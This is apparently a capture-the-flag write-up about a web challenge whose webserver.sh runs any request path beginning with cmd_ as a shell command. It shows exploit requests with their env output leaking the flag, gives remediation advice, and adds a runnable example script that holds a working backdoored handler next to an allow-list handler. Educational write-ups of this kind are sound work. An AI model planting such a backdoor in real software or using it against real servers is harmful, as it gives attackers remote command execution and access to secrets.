Notes:
Solution:
- The Dockerfile shows that xinetd.conf is used. It can simply be fetched from the webserver by requesting xinetd.conf (the whole app directory, scripts included, is served alongside the static files).
- xinetd.conf references /init.sh
- init.sh references /webserver.sh
- webserver.sh has a backdoor: for any request path starting with cmd_, it runs whatever follows the underscore as a shell command, as the user the webserver runs as (pleb, per the env output below).
- The flag can be found in the environment variables of that process.
http://diceprectf.meatctf.com:2182/cmd_ls
Dockerfile canvasBackground.js index.html init.sh main.css star.png stars.js webserver.sh xinetd.conf

http://diceprectf.meatctf.com:2182/cmd_env
SHELL=/bin/sh
REMOTE_HOST=93.209.73.130
SUDO_GID=0
HOSTNAME=288e8c33244a
SUDO_COMMAND=./webserver.sh
SUDO_USER=root
PWD=/app
LOGNAME=pleb
HOME=/root
FLAG=flag{w3b53rv3r_b4ckd00r}
TERM=unknown
USER=pleb
SHLVL=0
_STDBUF_E=0
_STDBUF_I=0
_STDBUF_O=0
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SUDO_UID=0
OLDPWD=/
_=/usr/bin/env
Flag
flag{w3b53rv3r_b4ckd00r}
Remediation:
- Do not implement backdoors. Not even if the source is not public: here the Dockerfile and all startup scripts were served from the same directory as the static files, so the "hidden" handler was one directory listing away.
- Do not hand secrets to the webserver process through its environment. FLAG was inherited across sudo into ./webserver.sh (see SUDO_COMMAND and FLAG in the env output), so any command the handler spawns gets it too.
- Serve only an explicit allow-list of static files from the document root, and keep the Dockerfile and the init and server scripts out of it.
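To make the backdoor pattern and its fix concrete, here is an added example (not the challenge's own webserver.sh, whose exact contents are not shown above): a minimal xinetd-style handler that reads the request line on stdin and answers on stdout, with the cmd_ backdoor as described in the solution, next to a handler that only serves an allow-list of the static files seen in the cmd_ls output. The function names, the /app document root (taken from PWD in the env output) and the HTTP/1.0 responses are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not the challenge's webserver.sh: a minimal xinetd-style
# HTTP handler (xinetd hands the accepted socket to the script as stdin and
# stdout) reproducing the cmd_ backdoor pattern, beside a handler without it.

# Extract the request path from an HTTP request line,
# e.g. "GET /cmd_env HTTP/1.1" -> "/cmd_env".
request_path() {
    set -- $1            # word-split the request line: method, path, version
    printf '%s\n' "$2"
}

# Assumption for this example: static files live in /app (PWD in the env output).
DOCROOT=${DOCROOT:-/app}

# Backdoored handler: any path beginning with /cmd_ has the remainder executed
# as a shell command, as the user the handler runs as, with the handler's whole
# environment (FLAG included) inherited by the child process.
backdoored_handler() {
    path=$(request_path "$1")
    case "$path" in
        /cmd_*)
            printf 'HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n'
            sh -c "${path#/cmd_}" 2>&1
            ;;
        *)
            safe_handler "$1"
            ;;
    esac
}

# Handler without the backdoor: only an explicit allow-list of static files
# (the names listed by cmd_ls above, minus the Dockerfile and scripts) is
# served, so the request path is never interpreted as anything but a lookup key.
safe_handler() {
    path=$(request_path "$1")
    [ "$path" = "/" ] && path=/index.html
    case "$path" in
        /index.html|/main.css|/stars.js|/canvasBackground.js|/star.png)
            if [ -f "$DOCROOT$path" ]; then
                printf 'HTTP/1.0 200 OK\r\n\r\n'
                cat "$DOCROOT$path"
            else
                printf 'HTTP/1.0 404 Not Found\r\n\r\n'
            fi
            ;;
        *)
            # Anything else, including /cmd_..., /Dockerfile, /webserver.sh and
            # traversal attempts, gets a 404 rather than a file or a shell.
            printf 'HTTP/1.0 404 Not Found\r\n\r\n'
            ;;
    esac
}

# Under xinetd the script is started once per connection: read one request
# line from stdin and answer on stdout. Only runs when invoked with --serve.
if [ "${1:-}" = "--serve" ]; then
    IFS= read -r line
    backdoored_handler "$line"
fi
```

Pointing xinetd at this script with --serve and requesting /cmd_env reproduces the leak: sh -c env prints the handler's environment, FLAG included. Swap backdoored_handler for safe_handler in the --serve branch and the same request gets a 404, because the path only ever selects from a fixed list of files.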